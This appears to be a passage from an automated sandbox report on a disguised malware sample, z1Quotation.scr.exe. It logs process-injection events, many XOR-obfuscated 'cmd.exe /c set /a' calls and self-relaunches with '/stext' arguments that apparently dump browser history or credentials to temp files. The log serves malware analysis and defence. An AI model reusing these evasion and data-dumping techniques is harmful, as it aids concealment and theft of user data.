                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess token adjusted: Debug

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\z1Quotation.scr.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\z1Quotation.scr.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\z1Quotation.scr.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\z1Quotation.scr.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\z1Quotation.scr.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\z1Quotation.scr.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeSection loaded: NULL target: C:\Users\user\Desktop\z1Quotation.scr.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /sort "Visit Time" /stext "C:\Users\user\AppData\Local\Temp\azdzamjeqinayzgxunqjk"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Users\user\Desktop\z1Quotation.scr.exe C:\Users\user\Desktop\z1Quotation.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xpsjxjoeplzrro"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\Desktop\z1Quotation.scr.exeProcess created: unknown unknownJump to behavior
